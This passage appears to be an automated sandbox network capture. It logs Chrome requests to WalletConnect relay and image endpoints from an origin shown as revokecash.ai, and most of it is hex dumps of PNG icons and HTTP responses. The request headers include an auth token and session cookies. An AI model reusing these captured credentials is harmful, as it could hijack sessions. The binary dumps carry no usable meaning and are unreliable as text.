                                                                          Data Ascii: m(oj9F*yp\Qy] >0Y`^-Y)UN(,&K{b\*Ih_\66A1U?6T(\U?!2 Bq,X!mZ6slT1pxTdy-/z, YkrUbyvcL)(]sAl=2}QBxS;
                                                                          2023-12-10 16:44:27 UTC61INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 8e ff 03 e2 01 0b 4d fe f2 1a 58 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: MXIENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          50192.168.2.54976318.141.17.514435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:25 UTC1048OUTGET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt0cWZHOEFlMTE1M1k2TnBrTmZUVk1XYUo4YUs3dFRwbTRwMzJydWhUZFExWCIsInN1YiI6Ijk2NDdiYWMwNjc4M2ZlYTBlZGI2ZjM3YzJhYjFlNzEwNGFjMjYyNTIxZWMzN2M5YmQyNGYyMzYwNDY4MjY3YjMiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0Lm9yZyIsImlhdCI6MTcwMjIyNjY2MywiZXhwIjoxNzAyMzEzMDYzfQ.yIyvx3Jv0SliresApCafdVYQ7jrORaA3CB9iXEXmDBL1fGm5fGUPkoBRtgv7T3KKwnjUqnAuFgPvf5SCQtFuDQ&projectId=4de540f0804c83871ac4d89ebb9031e9&ua=wc-2%2Fjs-2.9.0%2Fwindows10-chrome-117.0.0%2Fbrowser%3Arevokecash.ai&useOnCloseEvent=true HTTP/1.1
                                                                          Host: relay.walletconnect.org
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://revokecash.ai
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Sec-WebSocket-Key: bHoFJCbqFmAixEZAJIZcwA==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                          2023-12-10 16:44:26 UTC126INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 34 33 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 35 20 47 4d 54 0d 0a 0d 0a
                                                                          Data Ascii: HTTP/1.1 400 Bad Requestcontent-type: text/plain; charset=utf-8content-length: 43date: Sun, 10 Dec 2023 16:44:25 GMT
                                                                          2023-12-10 16:44:26 UTC43INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 75 70 67 72 61 64 65 27
                                                                          Data Ascii: Connection header did not include 'upgrade'


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          51192.168.2.549766104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:25 UTC650OUTGET /w3m/v1/getWalletImage/b6ee4efc-f53e-475b-927b-a7ded6211700?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __cf_bm=CrXZSKXu8ZgKzyOdQBeSUIBNIgVJ3sD4J7CBXgT0jfM-1702226664-1-Ad0SnxomqRFub2k1lBB/dWlE8xSqpNUxXb8Ef5NV91WLdS9Ug9mTw0zu7yezklS/cvZvVyVpp2lfgcm/kTVUtR8=
                                                                          2023-12-10 16:44:26 UTC948INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 36 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 64 35 62 63 37 66 36 64 61 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:26 GMTContent-Type: image/pngContent-Length: 13670Connection: closeCF-Ray: 8336f3d5bc7f6da4-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Cache-Control: public, max-a
                                                                          2023-12-10 16:44:26 UTC421INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 03 00 00 00 b7 61 c6 fe 00 00 03 00 50 4c 54 45 25 25 31 00 c2 6f ff ff ff 24 24 30 23 23 2f 26 1f 2e 21 22 2d 20 20 2c 20 20 31 00 c8 71 25 20 2e 00 c5 70 1f 1e 2a 25 26 32 25 22 2f 00 c6 70 c7 9f 17 d7 9c 0f f0 8a 85 cc 9e 14 c2 a0 19 df 9b 0c 1c 1c 28 bc a1 1b b7 a2 1e 00 c3 6f ac a4 22 b2 a3 20 9f a6 28 e2 90 90 12 ba 81 99 a7 2b 9d b1 c3 42 a5 b3 d4 9d 11 3b a8 ab 18 b7 87 29 b0 99 c7 9d a4 a8 90 b0 79 c2 dd cf 8c 99 5e 99 cf 4f a0 be db 8b 91 82 ac 35 91 a9 2e af 8f ac 60 b1 44 eb 8a 88 a1 90 b4 ce 9a 9f 24 b3 94 88 ab 33 2f ad 9f 76 c4 e0 82 be d7 1e b5 8e d5 8c 95 b4 a6 b2 c1 a0 a9 49 a3 b9 a3 ae be 6c b0 3f 77 94 cc ae a9 b6 97 b4 c7 da 94 96 48 b6 4f e7 9a 08 36 35 40 ea
                                                                          Data Ascii: PNGIHDRaPLTE%%1o$$0##/&.!"- , 1q% .p*%&2%"/p(o" (+B;)y^O5.`D$3/vIl?wHO65@
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 66 b8 8e a6 4b 4a 57 a8 a4 24 95 a8 2d 22 3a 3b 92 93 be 20 40 3c 23 33 37 1e 50 44 03 c1 73 a2 a5 27 71 72 7c 34 3a 49 05 b1 6a 7e 7c 85 8e b8 ce 27 bb 5d d2 d2 d5 18 63 4a e6 e6 e8 db 9b 0e 49 42 2b 3b 39 2e 68 cd ed dc 9c 0e 40 3f 4c 03 b8 6c 33 31 2f fc fc fc 01 bd 6d 4b 4d 2e 0c 97 5d 08 9f 61 f6 9b 03 a8 a8 ad 3e 5d 72 0d 8e 5a 13 75 50 16 6d 4e 36 4f 61 b1 b1 b7 5a 59 67 4c 6a 85 d2 a2 13 73 67 76 4a 78 95 75 5b 22 36 44 56 4f 3d 47 60 4a 55 c9 a3 17 90 91 99 96 ad 2e dc dc de 61 63 72 f3 8e 8a f7 f7 f7 88 86 28 5e 5f 2c ae a8 23 86 84 93 ac 8e 1c da a0 10 be 94 17 65 9b d8 84 c3 dd 14 7d 52 66 7d a2 91 62 6a a5 6d 72 53 a4 c4 73 6e 29 c0 a5 1b 65 50 25 98 b9 cd 99 9b a3 76 52 5a 35 88 8c 95 76 89 a3 80 1b 2d 75 75 be a9 b3 11 88 57 ca 90 a2 89 78
                                                                          Data Ascii: fKJW$-":; @<#37PDs'qr|4:Ij~|']cJIB+;9.h@?Ll31/mKM.]a>]rZuPmN6OaZYgLjsgvJxu["6DVO=G`JU.acr(^_,#e}Rf}bjmrSsn)eP%vRZ5v-uuWx
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: f7 76 54 35 f4 28 f1 c6 09 54 0d f7 e4 6d 7b af 79 fb ed 3f 5c a3 89 8c 3f ac df bb 6d 07 b7 c0 14 62 03 60 0b 76 6c 5b bb 7e fb f6 ed da 06 c4 76 21 f4 d2 4f 1e d1 05 a0 12 2d 53 76 ec 5f 7b cd f6 ed d7 a8 c7 f6 ed db af 11 14 43 a7 f1 89 56 57 a6 94 6d db bb 3e 88 a6 6c 8b 93 39 0a f4 e1 93 97 ae bc 56 93 04 ae 41 64 ac 9a 3c 03 e8 3e 2e 85 25 2f ad e3 e3 9a ed db d7 ee 5f 05 27 f3 b1 cc 09 ef c3 af dd be fd 5a f5 d8 be fd 5a 48 86 3b 54 2b e5 1b 80 cf f0 ef d7 d6 b2 03 db b7 5f bb 72 1b f2 f2 e1 69 57 78 c1 45 54 fb d7 5e 7b e0 c0 b5 d7 fe 51 6d 9f 0f 08 64 84 dd 38 50 28 d3 bf 6a 25 d7 40 75 f8 23 6a e0 b6 b2 19 31 37 45 01 14 8c a8 56 fe f1 c0 81 03 7f 54 8b 03 07 fe f8 c6 ca 55 93 23 d9 59 a4 29 65 db 56 be a1 ad 9d 07 38 e3 15 33 9c 20 b7 b1 6d 65
                                                                          Data Ascii: vT5(Tm{y?\?mb`vl[~v!O-Sv_{CVWm>l9VAd<>.%/_'ZZH;T+_riWxET^{Qmd8P(j%@u#j17EVTU#Y)eV83 me
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: db f9 02 d3 85 f8 07 1c c1 38 f2 75 1e c1 89 bf 9c c5 4a 3f ab bb 49 8c 3b b0 05 24 21 85 3a 3b 5d fb 05 9c 90 6e 61 98 79 c6 19 40 c6 79 5c 60 67 7f b1 e9 5b bc e5 c2 d9 6e 43 ba 0d 81 f7 21 dd 86 9c 35 09 09 04 e0 3a 2f 4a ac db 90 6e 67 75 0e 4b 41 d6 f9 b3 43 86 0c 11 28 d1 bb f8 78 04 7b 81 90 98 ce 43 18 64 fc 6f 08 86 b3 43 f5 55 c0 78 84 6d de 59 4c 62 ff 3c af 2f 21 6c de 10 02 61 59 02 8b 2f d8 7f c1 09 39 fb bf 2c 5d c3 20 7b 0e 64 59 2a 5f ef 20 2e 0e 61 1b 8a c9 eb 9f 67 ff 57 a0 ab c8 ec 85 ff c4 f1 9b be a5 c7 25 d8 1c 42 64 43 f4 9d 4a db 4a 3e 84 85 0a 77 9d f5 2f 2e c1 e6 0d c1 45 f6 4f 7d ad bc 7d fe 87 18 db 1f ce 36 e7 85 01 c1 16 fc 46 a8 88 be 33 43 f6 1d 8c 90 ff 9e dd 67 5a ac 80 00 59 ff fb 2f 3e 88 4b f4 25 64 df 87 ff 95 f0 e1
                                                                          Data Ascii: 8uJ?I;$!:;]nay@y\`g[nC!5:/JnguKAC(x{CdoCUxmYLb</!laY/9,] {dY*_ .agW%BdCJJ>w/.EO}}6F3CgZY/>K%d
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: f6 a1 fc 59 41 c9 3e 08 61 6d 39 b3 13 92 bc d8 e0 39 49 4a d8 97 67 93 7f cf 56 22 9c 33 93 d4 df bb d1 f6 a1 0e be b4 54 a5 0d e4 e2 09 37 49 73 83 0a 1d 6c ef 11 52 7b 57 cf 53 da be 6e db b6 45 db 16 22 21 5a cf a0 22 08 f1 d5 bf 40 84 b0 59 f3 66 f9 a2 83 a3 64 7a 89 5c 49 d8 bc e9 7c a1 0e 05 1d b0 4b e7 9c 29 9c 37 c9 9d 59 19 c2 39 7c 4e 91 10 24 39 1d af 60 06 5c 5f b7 6d 21 a1 ad e6 f6 91 84 a4 2a 9f 13 17 80 10 7b de 9c 24 47 82 5f 38 1c fd b3 c8 5e 4b 42 4d 9d e5 15 1b 02 ec 4c bd e4 39 5e 9e 8d cd 9f 95 ea eb ab aa 60 7f 8f 90 da 7b 7a 9e 85 fb 2e 52 90 16 2d b8 a7 f9 21 99 ac 84 84 64 c5 8d e0 fe 09 b1 e5 8c 4d 4a 90 21 55 ae 2f a9 49 b3 65 25 db e6 89 36 cb 6b 18 b1 39 09 62 01 a9 b3 bc ec a8 68 ee 7c 99 d0 40 a0 df c5 64 d6 56 57 42 c0 bb
                                                                          Data Ascii: YA>am99IJgV"3T7IslR{WSnE"!Z"@Yfdz\I|K)7Y9|N$9`\_m!*{$G_8^KBML9^`{z.R-!dMJ!U/Ie%6k9bh|@dVWB
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 84 48 c9 c1 e4 c0 4b f9 a2 b7 20 83 55 71 e1 43 9c 6a 08 ef 70 0a 20 c4 61 e2 9c 43 8c 03 1c a3 83 de 58 ce e6 37 c7 45 d6 5c df 8b 8c d1 d5 38 db cd 9b 69 f4 74 32 42 b0 c0 27 21 69 ae 10 3a f9 20 44 70 00 a9 09 81 bb 24 5e 98 d5 41 ec 13 11 b5 4c 58 17 14 a6 7d 7c ba 44 08 b9 c4 a5 28 c1 e5 27 24 ed 0b 7a 5c c3 31 8c 41 d7 89 ba c5 c2 16 13 84 34 d7 a8 7f 72 42 2c b6 12 71 bf 87 78 91 7a 1f 84 88 a9 28 15 49 3e 51 15 c8 83 31 53 c6 69 99 e0 6c 1c a3 39 cb 26 68 96 b0 13 42 52 a9 e0 2f c0 6a af c0 09 f9 ec 47 7d cf 94 65 0b 08 83 f8 99 46 0f e5 45 08 00 82 71 49 48 15 82 27 1f 84 cc 13 07 7d 60 b5 f4 41 88 b4 4a c5 e7 d8 05 96 85 94 bb 8d 9f 06 f2 1a 23 e6 4d 42 08 7a 2d ce f7 08 42 de 0d b6 1c 65 80 ac 1f 3f 6b de 4c bc 7d a6 31 86 f3 22 04 5e 35 50 34
                                                                          Data Ascii: HK UqCjp aCX7E\8it2B'!i: Dp$^ALX}|D('$z\1A4rB,qxz(I>Q1Sil9&hBR/jG}eFEqIH'}`AJ#MBz-Be?kL}1"^5P4
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 85 b2 bc 89 9f 4a 55 38 e7 4e 03 ec 95 5b db 70 72 ea d9 b3 4d 9b ad 1f 87 21 c8 b2 00 f7 c7 3d 31 6c ad 64 d4 7f d7 3f 21 b8 d3 f6 29 2c f2 34 75 74 5a 74 aa f7 69 d1 8e d4 f9 3e af 82 01 a4 ac 98 f2 8c 46 4a bd c0 1a 42 3b 25 b0 6a 2b 2f 27 48 c9 d6 2a 3d 37 5a 8b a0 50 25 88 f5 36 1a 2b f1 4f 88 c5 5e 48 04 40 3e 2e 1c 30 3a f0 85 03 92 67 95 f8 b9 2a 09 76 a2 89 62 16 46 dc 0d 14 d2 59 08 96 10 07 af 7a 30 95 5b f1 4a b4 a8 61 00 42 2c 2c e1 6f 7d 5d 5a 63 b6 bf 2b 9d 20 e7 32 ba 50 29 26 16 6b 91 ce 83 56 de 00 87 a9 50 68 3f b6 4d 15 f7 24 08 59 40 87 50 98 4f 30 0b 70 42 9e d4 e2 a8 02 12 52 80 ff 3e b8 ef 8b cf 0c f4 47 49 b2 63 6e 81 5f 33 83 cd 34 94 37 c0 89 f9 ae 50 7f 33 9e 5e 40 10 12 16 9f 6e b1 80 e2 9e 4f e2 8c 2c 50 af 87 81 08 21 66 1a
                                                                          Data Ascii: JU8N[prM!=1ld?!),4utZti>FJB;%j+/'H*=7ZP%6+O^H@>.0:g*vbFYz0[JaB,,o}]Zc+ 2P)&kVPh?M$Y@PO0pBR>GIcn_347P3^@nO,P!f
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: a0 50 ea c5 79 19 b0 14 f1 12 9c 59 0f 75 c4 6a 9d 69 ad 91 99 7f d5 84 00 67 dd 44 ae b0 fa fa 7a ee 99 60 57 89 10 2d 22 65 ab 05 dd e0 9e be 8a 50 bc 43 57 8e 1a 81 61 94 7a 9b 45 b9 97 5b ad d6 9a 14 f1 0d 8e a1 7a 6c 5e 4c 9f b3 5a ad 47 44 91 73 07 58 27 96 17 2d ca cd 5d 54 b4 10 c9 b1 88 5c 40 57 4d 88 b3 08 51 3a a1 66 51 6e 6e 7a 51 39 22 67 0d 56 56 4a d1 c8 89 13 27 42 83 66 9d c8 e1 b2 a6 31 1e bc 60 42 83 bd 7a 04 81 4d ea 4f ff 74 ee b2 5a ad 97 a5 b8 cc d9 19 c9 7b 8d 48 11 5d 3c 92 94 b8 7b a1 d5 ba bc 28 d3 99 e2 64 18 67 8a 33 7d b9 b7 21 51 4b 88 b3 0e f2 b1 bc ce 93 e2 64 68 c6 99 52 7c 45 c6 2e 70 a7 a5 a5 a5 65 1e b1 5a 67 2e ca 4c 43 af b5 9c 96 00 32 3f 25 e4 12 21 8b 85 4c e5 88 11 23 be 1b f5 dd a8 ef 50 c5 df a9 9f 1b 3a 17 41
                                                                          Data Ascii: PyYujigDz`W-"ePCWazE[zl^LZGDsX'-]T\@WMQ:fQnnzQ9"gVVJ'Bf1`BzMOtZ{H]<{(dg3}!QKdhR|E.peZg.LC2?%!L#P:A
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: ed db b7 ef 9a a8 6c 41 67 bf ea 4b 40 bd 9a 42 31 cf ac c7 d7 d2 91 cd aa 57 5a 9d ad 47 42 f4 c0 70 35 c5 59 ba 6b a6 75 f9 65 af 3c ae ca 15 c3 94 5c 38 a7 99 b9 30 d7 82 4a a3 4b af a0 c5 da 45 f2 84 23 b7 6c 95 82 0e c9 54 23 59 e0 5e 43 8a 22 f2 2e dd 82 dc 3a d9 8a 61 aa 37 16 23 9b 45 1a 74 34 2c 15 32 ef c8 15 5b ad 13 76 8d 5b 52 b4 66 e1 48 98 63 29 97 2f 61 a8 5f 53 e7 66 99 f5 e7 6a 8a ea 8a 6a ce a1 d5 ca 89 e9 72 e3 c4 39 9b 89 35 45 45 6b 8e 4c 54 a5 f6 5e 92 88 bc 4b b7 70 6e 9d 68 c6 1d 75 9a 6c 16 29 56 7e 33 c3 11 f9 d0 a2 2c e5 64 de a9 28 a5 dc 6a ad 27 52 db ea b7 01 31 a5 e7 64 69 93 23 a5 de ce c2 59 23 7e ac ce b9 b3 e3 48 41 44 c3 a5 5b 38 cb 79 07 8e 2f 55 47 be c8 35 58 cf 61 16 9a db 0f e4 9d 79 b7 50 60 dc 72 49 7e e7 72 9d
                                                                          Data Ascii: lAgK@B1WZGBp5Ykue<\80JKE#lT#Y^C".:a7#Et4,2[v[RfHc)/a_Sfjjr95EEkLT^Kpnhul)V~3,d(j'R1di#Y#~HAD[8y/UG5XayP`rI~r


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          52192.168.2.549768104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:25 UTC650OUTGET /w3m/v1/getWalletImage/204b2240-5ce4-4996-6ec4-f06a22726900?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __cf_bm=CrXZSKXu8ZgKzyOdQBeSUIBNIgVJ3sD4J7CBXgT0jfM-1702226664-1-Ad0SnxomqRFub2k1lBB/dWlE8xSqpNUxXb8Ef5NV91WLdS9Ug9mTw0zu7yezklS/cvZvVyVpp2lfgcm/kTVUtR8=
                                                                          2023-12-10 16:44:28 UTC949INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 35 35 38 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 64 37 62 66 35 61 34 63 31 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:28 GMTContent-Type: image/pngContent-Length: 35580Connection: closeCF-Ray: 8336f3d7bf5a4c1a-MIACF-Cache-Status: MISSAccept-Ranges: bytesAccess-Control-Allow-Origin: *Cache-Control: public, max-
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 03 00 00 00 b7 61 c6 fe 00 00 03 00 50 4c 54 45 0d 0d 0d ff e1 6d ff b4 3c ff bc 45 ff b1 39 ff dd 69 ff ba 43 ff b5 3d ff e0 6c ff c6 4f a2 60 03 ff d9 65 ff e7 73 ff d4 5f ff da 66 ff d8 64 ff ce 58 ff cc 56 ab a7 02 aa a6 02 ff be 47 ff b3 3b ff b2 3a ff af 37 ff b7 3f ff d6 62 ff b8 40 ff df 6b ff d7 62 ff b6 3e 0a 0b 0c ff c8 51 ff c9 53 ff d2 5d ff b9 41 ff de 6a ff db 66 ff bb 44 ff b0 38 ff dc 68 ff bf 48 c0 7e 05 a7 65 04 ff e3 70 ff d0 5b a8 a3 03 a5 62 03 a3 9e 03 ff df 6c ff e4 70 b2 6f 06 ff c2 4c ff e2 6e d2 ce 05 ff ad 34 e4 e3 0e e0 de 09 bc 7a 05 ff c1 4a be 7c 05 a6 a1 03 ff d5 60 c2 be 09 cc 8c 08 ae a9 03 b6 b0 06 c4 c1 08 ca c6 0b ff e3 6f a7 9f 03 c3 81 06 ba
                                                                          Data Ascii: PNGIHDRaPLTEm<E9iC=lO`es_fdXVG;:7?b@kb>QS]AjfD8hH~ep[blpoLn4zJ|`o
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: b8 cc c2 85 15 87 d9 82 03 a5 55 7f 35 d0 d0 ac 38 dc c3 61 a0 d1 f2 b9 9c 15 26 62 1b c6 9b 4a df 98 c6 0d d9 57 79 51 32 46 1c 02 90 7f bd 34 fe 6a 26 0d 77 03 87 3d 0c b7 96 7f c6 b8 a1 61 61 0a 43 23 0d 7d 56 65 16 c5 05 18 02 90 7f 91 34 9e 29 c5 7d 36 4f e5 72 8a 6b 1b c8 75 eb 71 ce c2 10 c7 0d f2 f0 30 a9 8d 98 4a a3 95 68 8e ff 8d 1c d7 2a c5 35 07 a1 a5 21 c5 71 f7 57 1c 86 f5 9f 2a 8e 76 ed 2c d2 2a 63 d4 68 aa ae ff 50 cc d0 2d 00 4d 78 00 90 7f 91 af 32 53 87 c0 c2 dd c0 61 60 e1 a6 3a 34 5a 50 e1 18 b5 61 a4 61 be 1e d7 f9 2a d1 55 d9 d1 00 20 ff 72 18 2e 78 aa 67 89 1b 36 cb 3f 5b 18 76 d2 d0 a7 b8 a2 ab 92 e5 e1 a1 cb 71 8d a5 2a 6b 1a 2d 5a b4 70 0d 88 5b 30 cc e2 b8 99 34 48 92 eb 0e 8e d7 34 71 dc 0d 4f a5 a5 61 5c 72 58 e6 54 ed 14 18
                                                                          Data Ascii: U58a&bJWyQ2F4j&w=aaC#}Ve4)}6Orkuq0Jh*5!qW*v,*chP-Mx2Sa`:4ZPaa*U r.xg6?[vq*k-Zp[04H4qOa\rXT
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 85 70 f4 7f d9 e3 c9 8d 23 c8 ad ff af 18 fc 8b 8f dc 78 74 af 51 5b bb ed 58 03 0d 1d 0f ce 42 53 1c 31 d0 c0 3c 86 e9 81 74 7b 1e 75 3c e3 7a bc 65 8f 97 7f 7f 78 e5 df 18 38 4c 2c 74 c3 95 87 bf f7 68 2f 27 55 ee 57 47 0c 0b 40 2b 5f e5 a9 ca 43 04 e2 e6 62 5c dd ff 7b c6 15 c7 6b 8d ba fd 7e e3 da ff 8a ab 52 cd 19 9a 7d ed c6 93 96 ed 4c 7c 95 ea a8 6c a4 61 bf e0 d0 c0 10 80 3c 7b 6d 04 45 8e 67 c1 d1 f2 b5 96 8d fa b7 7c 72 f1 81 e3 3f 01 87 03 21 71 3c b8 f8 c4 e3 85 76 5e 96 87 dc 5c d8 e3 68 d5 c2 4e 1a 5a 18 0c 88 e5 02 d0 62 8f a3 11 f6 54 56 f2 30 b9 39 0e 40 1a bd dc b4 e1 ca ce ff b5 c8 a1 33 a7 d3 b9 f3 4a 43 8b c6 4d 9f 67 07 90 ec 7c b8 1e c7 15 20 96 71 c3 f6 ea 80 fd 19 69 13 1c 2d 5f 6e fa f0 ca ce 7f d9 62 fc d9 2d 74 e7 95 87 2d 5a
                                                                          Data Ascii: p#xtQ[XBS1<t{u<zex8L,th/'UWG@+_Cb\{k~R}L|la<{mEg|r?!q<v^\hNZbTV09@3JCMg| qi-_nb-t-Z
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 69 d5 19 c2 fa 16 59 21 98 89 48 e4 5d e4 b6 a4 a0 ee 26 10 c8 b6 3a b5 b2 e3 60 84 d1 46 c8 71 35 d2 68 d3 66 22 98 c3 7e 97 c3 84 86 a1 e7 64 5b f1 16 7f ff df 6f bb 5d 68 a7 0a e1 2e 6b 3e 8b 22 f3 30 0f be 2e c1 02 01 89 e4 6c 89 a9 e3 48 d6 cb 12 f9 00 67 5a 86 48 f2 1c 0a 81 a2 fc ed 27 1e 36 30 3c 55 18 36 d2 98 48 cc e1 46 e4 78 4d 1b 38 a4 76 ac b4 a3 42 ff 47 47 9e a1 74 55 86 14 52 b3 bb 86 3a ad f9 6c 29 32 ef 16 8d ea b7 80 47 cc ba 9c 75 75 39 31 eb b6 e4 50 89 d4 09 48 e4 54 4b c9 7d df a5 0e eb d9 62 08 26 e2 3c d2 e0 61 e1 b1 34 29 2e 05 a2 89 e3 13 39 0e 00 e2 9e af 6a ac 86 71 5d eb b0 96 8d 1e 3e 78 86 4a 22 51 48 4d 8d 10 44 90 44 6e f1 d4 97 ad 45 d0 da 3d 26 a7 0e 4b 84 65 be eb 75 cb 43 7d 14 61 c1 dd 7d 20 10 48 1e b6 32 21 a2 43
                                                                          Data Ascii: iY!H]&:`Fq5hf"~d[o]h.k>"0.lHgZH'60<U6HFxM8vBGGtUR:l)2Guu91PHTK}b&<a4).9jq]>xJ"QHMDDnE=&KeuC}a} H2!C
